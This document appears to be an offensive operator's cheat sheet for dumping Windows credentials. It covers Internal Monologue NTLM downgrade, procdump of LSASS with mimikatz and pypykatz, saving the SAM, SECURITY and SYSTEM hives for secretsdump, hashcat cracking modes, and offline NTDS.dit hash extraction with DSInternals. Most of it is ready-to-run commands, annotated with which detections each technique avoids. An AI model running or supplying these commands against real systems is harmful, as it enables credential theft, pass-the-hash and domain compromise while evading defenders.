Alternate Cred Dumps

Internal Monologue

Internal Monologue (Elad Shamir's tool) is a way of getting every logged-on user's NetNTLMv1 challenge/response without opening a handle to LSASS. It temporarily lowers the NTLM settings in the registry (LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic) so that NetNTLMv1 is allowed, impersonates each logged-on user's token, and asks the local NTLM SSP to answer a challenge the tool chooses (1122334455667788 by default). Because LSASS memory is never read, handle-to-lsass.exe detections do not fire; the registry writes are what a defender can see, so leave the tool's restore option enabled (the default) so the original values are put back. Impersonating other users and editing those keys requires local administrator or SYSTEM; as an unprivileged user you only get a response for your own account, and if the downgrade could not be applied it is a NetNTLMv2 response rather than NetNTLMv1.

Using Internal Monologue

# Run the .NET assembly in Beacon's memory; replace [help] with the tool's options
execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]

Cracking Returned Hashes

# -m 5500 = NetNTLMv1 / NTLMv1-ESS; responses obtained without the downgrade are NetNTLMv2 (-m 5600).
# Because the challenge is fixed and known, a NetNTLMv1 response can also be converted back to the
# user's NT hash (DES key brute force / rainbow tables) instead of guessing the password.
# --force disables hashcat's driver sanity checks; only keep it if hashcat otherwise refuses to start.
hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 --force

Procdump + Mimikatz

# Dump LSASS with the Microsoft-signed Sysinternals binary. The signature only gets the
# binary past AV: procdump still opens lsass.exe with read access and copies its memory,
# which EDR and Sysmon (Event ID 10 ProcessAccess on lsass.exe) see like any other dumper.
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

# Move lsass.dmp offline and use mimikatz to open it and dump passwords. Use a mimikatz of
# the same architecture as the dumped process (x64 dump -> x64 mimikatz), ideally on the
# same Windows build as the victim.
mimikatz # sekurlsa::minidump /root/lsass.dmp
mimikatz # sekurlsa::logonpasswords

# Same thing from Linux without mimikatz
pypykatz lsa minidump /root/lsass.dmp

# Viewing the dump with Invoke-Mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'

Reg SAM / Security / System

# Needs local admin: the SAM and SECURITY hives are not readable otherwise.
# Remove the three files from the host when done.
reg save hklm\system system
reg save hklm\security security
reg save hklm\sam sam

# Extract offline with impacket. Output is the local SAM hashes (crack with hashcat -m 1000
# or use for pass-the-hash), the cached domain logons (MS-Cache v2 / DCC2) and the LSA
# secrets such as the machine account and any service account passwords.
python secretsdump.py -security security -system system -sam sam LOCAL

# Cracking the MS-Cache v2 hashes recovered
# secretsdump prints them as DOMAIN/username:$DCC2$10240#username#hash (newer versions
# append a timestamp). hashcat -m 2100 wants only the $DCC2$ part, so strip the
# DOMAIN/username: prefix and anything after the hash. Keep the iteration count exactly
# as printed: 10240 is the Windows default, but it is a per-host setting.
$DCC2$10240#username#hash

# Crack. DCC2 is PBKDF2-HMAC-SHA1, so it is far slower than NTLM and, unlike an NT hash,
# cannot be used for pass-the-hash; cracking is the only way to use it.
hashcat -m 2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable

Offline DCSync

# For this you need the NTDS.dit file and the SYSTEM registry hive. On a running DC
# ntds.dit is held open exclusively, so take both from a shadow copy (ntdsutil ifm or
# vssadmin) or, as here, from a mounted DC VM disk.
# You will also need the DSInternals PowerShell module. This can be moved across machines.

# Import DSInternals
import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1

# Grab the boot key from the SYSTEM hive; the password attributes in the DIT are encrypted
# with a key derived from it. This can be done offline or against a mounted DC VM.
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM

# Extract user information from NTDS.dit
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key

# Extract the NT hashes from NTDS.dit in hashcat's user:hash format (hashcat -m 1000 --username)
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII

# The file can then be cracked or used for pass-the-hash exactly like live DCSync output.
# Nothing is replicated, so DCSync detections on Event 4662 with the DS-Replication-Get-Changes
# rights never fire; what is observable is the shadow copy / file copy on the DC itself.
# impacket equivalent: secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL